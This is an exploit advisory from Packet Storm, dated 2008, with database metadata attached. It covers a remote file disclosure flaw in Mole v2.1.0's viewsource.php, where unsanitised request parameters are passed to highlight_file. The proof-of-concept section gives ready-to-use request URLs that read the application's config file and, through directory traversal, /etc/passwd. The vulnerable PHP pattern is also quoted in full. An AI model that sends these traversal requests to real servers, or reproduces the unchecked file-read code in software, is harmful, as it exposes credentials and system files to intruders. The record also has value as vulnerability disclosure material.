ID PACKETSTORM:65292
Type packetstorm
Reporter GolD_M
Modified 2008-04-08T00:00:00
Description
`# Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability
# Script : http://sourceforge.net/project/showfiles.php?group_id=164171
# Vuln Code :
##############################################################################
# <html>
# <head>
# <title>Mole: Template viewer</title>
# <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
# </head>
# <body>
#
# <?php
# $dirn = $_REQUEST['dirn']; <--- XxX
# $fname = $_REQUEST['fname']; <--- XxX
#
#
# highlight_file($dirn.$fname); <--- XxX
# ?>
#
# </body>
# </html>
##############################################################################
# POC :
# /mole_2_1_0/viewsource.php?dirn=include/config.inc.php
# /mole_2_1_0/viewsource.php?fname=include/config.inc.php
# /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd
##############################################################################
# Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr
##############################################################################
`
{"hash": "2032371135ee29c0d56f327bd2bccc0baa1a653b47cbe458fb8e036428f79f03", "sourceHref": "https://packetstormsecurity.com/files/download/65292/mole-disclose.txt", "title": "mole-disclose.txt", "id": "PACKETSTORM:65292", "published": "2008-04-08T00:00:00", "description": "", "modified": "2008-04-08T00:00:00", "sourceData": "`# Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability \n# Script : http://sourceforge.net/project/showfiles.php?group_id=164171 \n# Vuln Code : \n############################################################################## \n# <html> \n# <head> \n# <title>Mole: Template viewer</title> \n# <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\"> \n# </head> \n# <body> \n# \n# <?php \n# $dirn = $_REQUEST['dirn']; <--- XxX \n# $fname = $_REQUEST['fname']; <--- XxX \n# \n# \n# highlight_file($dirn.$fname); <--- XxX \n# ?> \n# \n# </body> \n# </html> \n############################################################################## \n# POC : \n# /mole_2_1_0/viewsource.php?dirn=include/config.inc.php \n# /mole_2_1_0/viewsource.php?fname=include/config.inc.php \n# /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd \n############################################################################## \n# Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr \n############################################################################## \n \n`\n", "reporter": "GolD_M", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "82fa0611e939b926ed206ac3e50d536a"}, {"key": "modified", "hash": "064c780fdff0455f3a316670cc398713"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "064c780fdff0455f3a316670cc398713"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "cfd50f14339be9c489e64f9673400655"}, {"key": "sourceData", "hash": "2e051bfad015de220d22104a0dabf6c9"}, {"key": "sourceHref", "hash": "de6747413793be1ffebb41e63ca020bb"}, {"key": "title", "hash": "a636b34a5b66808eb7e38da47918e980"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/65292/mole-disclose.txt.html", "lastseen": "2016-11-03T10:18:01", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}}
{"result": {}}